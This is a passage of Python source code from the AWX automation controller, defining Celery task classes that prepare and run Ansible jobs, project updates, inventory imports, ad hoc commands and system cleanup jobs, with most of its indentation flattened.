d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
if job.inventory.kind == 'smart':
            # cache smart inventory memberships so that the host_filter query is not
            # run inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if self.should_use_fact_cache():
job.log_lifecycle("start_job_fact_cache")
self.facts_write_time = start_fact_cache(
job.get_hosts_for_fact_cache(), os.path.join(private_data_dir, 'artifacts', str(job.id), 'fact_cache'), inventory_id=job.inventory_id
)
def build_project_dir(self, job, private_data_dir):
self.sync_and_copy(job.project, private_data_dir, scm_branch=job.scm_branch)
def post_run_hook(self, job, status):
super(RunJob, self).post_run_hook(job, status)
job.refresh_from_db(fields=['job_env'])
private_data_dir = job.job_env.get('AWX_PRIVATE_DATA_DIR')
if (not private_data_dir) or (not hasattr(self, 'facts_write_time')):
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if self.should_use_fact_cache() and self.runner_callback.artifacts_processed:
job.log_lifecycle("finish_job_fact_cache")
finish_fact_cache(
job.get_hosts_for_fact_cache(),
os.path.join(private_data_dir, 'artifacts', str(job.id), 'fact_cache'),
facts_write_time=self.facts_write_time,
job_id=job.id,
inventory_id=job.inventory_id,
)
def final_run_hook(self, job, status, private_data_dir):
super(RunJob, self).final_run_hook(job, status, private_data_dir)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_task_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
callback_class = RunnerCallbackForProjectUpdate
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.job_private_data_dir = job_private_data_dir
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = str(True)
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
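# Illustrative outcomes of the helper above (URLs are made up):
#   * git over ssh, e.g. 'ssh://git@example.com/org/repo.git':
#         extra_vars == {'scm_accept_hostkey': 'true'} and the password is dropped.
#   * svn with a username: credentials are passed via extra_vars['scm_username']
#         and extra_vars['scm_password'] instead of being embedded in the URL.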
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning(f'Galaxy role/collection syncing is enabled, but no credentials are configured for {project_update.project.organization}.')

extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
'galaxy_task_env': settings.GALAXY_TASK_ENV,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
if project_update.project.signature_validation_credential is not None:
pubkey = project_update.project.signature_validation_credential.get_input('gpg_public_key')
extra_vars['gpg_pubkey'] = pubkey
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
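# Sketch of how a prompt table like the one above could be consumed; the names
# here are hypothetical and the real matching is performed by ansible-runner:
#     import re
#     expect_passwords = {
#         re.compile(pattern, re.M): passwords.get(password_name, '')
#         for pattern, password_name in self.get_password_prompts(passwords).items()
#     }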
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
project_path = instance.project.get_project_path(check_if_exists=False)
if instance.launch_type != 'sync':
self.acquire_lock(instance.project, instance.id)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
def build_project_dir(self, instance, private_data_dir):
# The project update playbook is not in a git repo, but uses a vendoring directory.
# To be consistent with the ansible-runner model, that directory is moved into
# the runner project folder here.
awx_playbooks = self.get_path_to('../../', 'playbooks')
shutil.copytree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(project, job_private_data_dir):
"""Copy project content (roles and collections) to a job private_data_dir
:param object project: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
"""
project_path = project.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
shutil.copytree(project_path, destination_folder, ignore=shutil.ignore_patterns('.git'), symlinks=True)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(project.get_cache_path(), project.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
shutil.copytree(cache_subpath, dest_subpath, symlinks=True)
logger.debug('{0} {1} prepared {2} from cache'.format(type(project).__name__, project.pk, dest_subpath))
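# After make_local_copy runs, the job's private data dir contains roughly:
#     <job_private_data_dir>/project/                   (project content, .git excluded)
#     <job_private_data_dir>/requirements_collections/  (copied from the durable cache)
#     <job_private_data_dir>/requirements_roles/        (copied from the durable cache)
# The last two only exist when the corresponding AWX settings are enabled and a
# cache entry was previously written for this project.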
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.runner_callback.playbook_new_revision:
instance.scm_revision = self.runner_callback.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Copy the roles and collections folders to the durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
self.make_local_copy(instance, self.job_private_data_dir)
finally:
if instance.launch_type != 'sync':
self.release_lock(instance.project)
p = instance.project
if instance.job_type == 'check' and status not in ('failed', 'canceled'):
if self.runner_callback.playbook_new_revision:
p.scm_revision = self.runner_callback.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:z",
f"{cache_path}:{cache_path}:z",
]
)
return params
@task(queue=get_task_queuename)
class RunInventoryUpdate(SourceControlMixin, BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
callback_class = RunnerCallbackForInventoryUpdate
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
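# Illustrative result of the collections-path handling above, assuming nothing
# earlier in build_env set ANSIBLE_COLLECTIONS_PATHS and os.pathsep is ':':
#     env['ANSIBLE_COLLECTIONS_PATHS'] ==
#         '~/.ansible/collections:/usr/share/ansible/collections:/usr/share/automation-controller/collections'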
def write_args_file(self, private_data_dir, args):
return self.write_private_data_file(private_data_dir, 'args', ' '.join(args))
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# special case for constructed inventories, we pass source inventories from database
# these must come in order, and in order _before_ the constructed inventory itself
if inventory_update.inventory.kind == 'constructed':
inventory_update.log_lifecycle("start_job_fact_cache")
for input_inventory in inventory_update.inventory.input_inventories.all():
args.append('-i')
script_params = dict(hostvars=True, towervars=True)
source_inv_path = self.write_inventory_file(input_inventory, private_data_dir, f'hosts_{input_inventory.id}', script_params)
args.append(to_container_path(source_inv_path, private_data_dir))
# Include any facts from input inventories so they can be used in filters
start_fact_cache(
input_inventory.hosts.only(*HOST_FACTS_FIELDS),
os.path.join(private_data_dir, 'artifacts', str(inventory_update.id), 'fact_cache'),
inventory_id=input_inventory.id,
)
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
# Added to support older versions of ansible-inventory (https://github.com/ansible/ansible/pull/79596);
# --limit should be usable in ansible-inventory 2.15+
if inventory_update.limit:
args.append('--limit')
args.append(inventory_update.limit)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
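# Illustrative argument list produced above for an SCM inventory source whose
# source_path is 'inventories/hosts.yml' (assuming CONTAINER_ROOT is '/runner'
# and an inventory update with id 42; limit and verbosity unset):
#     ['ansible-inventory', '--list', '--export',
#      '-i', '/runner/project/inventories/hosts.yml',
#      '--output', '/runner/artifacts/42/output.json',
#      '--playbook-dir', '/runner/project/inventories']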
def should_use_fact_cache(self):
return bool(self.instance.source == 'constructed')
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
self.write_private_data_file(private_data_dir, injector.filename, content, sub_dir='inventory', file_permissions=0o700)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def build_project_dir(self, inventory_update, private_data_dir):
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if inventory_update.source == 'scm':
if not source_project:
raise RuntimeError('Could not find project to run SCM inventory update from.')
self.sync_and_copy(source_project, private_data_dir, scm_branch=inventory_update.inventory_source.scm_branch)
else:
# If source is not SCM, make an empty project directory; content is built inside the inventory folder
super(RunInventoryUpdate, self).build_project_dir(inventory_update, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
inventory_update.refresh_from_db()
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', str(inventory_update.id), 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.runner_callback.event_handler,
signal_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.runner_callback.event_ct,
initial_line=self.runner_callback.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_task_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
callback_class = RunnerCallbackForAdHocCommand
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
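# Illustrative output of build_args for a check-mode ad hoc command with become
# enabled, 5 forks and verbosity 2 (credential values are made up):
#     ['--check', '-u', 'root', '--become', '--forks=5', '-vv', 'all']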
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = dict()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
extra_vars.update(ad_hoc_command.awx_meta_vars())
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_task_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
callback_class = RunnerCallbackForSystemJob
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
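# Illustrative result for a cleanup_jobs system job whose extra_vars is '{"days": 30}':
#     ['awx-manage', 'cleanup_jobs', '--days', '30',
#      '--jobs', '--project-updates', '--inventory-updates', '--management-jobs',
#      '--ad-hoc-commands', '--workflow-jobs', '--notifications']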
def write_args_file(self, private_data_dir, args):
return self.write_private_data_file(private_data_dir, 'args', ' '.join(args))
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is currently able to run only by turning off isolation;
# the goal is to run it in a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
|
